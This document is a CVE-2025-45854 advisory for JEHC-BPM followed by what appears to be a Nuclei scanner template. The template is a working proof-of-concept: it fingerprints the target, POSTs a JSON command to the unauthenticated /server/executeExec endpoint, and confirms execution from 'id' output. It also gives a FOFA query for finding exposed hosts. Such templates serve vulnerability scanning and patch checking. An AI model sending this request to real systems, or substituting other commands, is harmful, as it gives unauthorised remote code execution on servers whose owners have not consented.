A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
PoC代码[已公开]
id: CVE-2025-45854
info:
name: JEHC-BPM - Remote Code Execute
author: ritikchaddha
severity: critical
description: |
A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
reference:
- https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460
- https://nvd.nist.gov/vuln/detail/CVE-2025-45854
classification:
epss-score: 0.10795
epss-percentile: 0.93081
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-45854
cwe-id: CWE-862,CWE-434
metadata:
max-request: 1
product: jehc-bpm
fofa-query: body="JEHC"
tags: cve,cve2025,jehc-bpm,rce
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
words:
- "JEHC"
- "XSHI"
case-insensitive: true
internal: true
- raw:
- |
POST /server/executeExec HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{
"actuator": {
"clientIp": "127.0.0.1",
"port": 8082,
"applicationName": "testApp",
"env": "prod",
"uploadTime": 1704523200000,
"hasPrefixApplicationName": false,
"clientHttpPrefix": "http"
},
"execParams": {
"command": "id"
}
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 4a0a004730450220680c3e3415dd179d97880e097546af918c26a04d7f0b118910c8fc2dbba610ac0221008a48a7535924ee910ff01f637eaa0bb9d36435e069357b852e388f2eab94c925:922c64590222798bb761d5b6d8e72950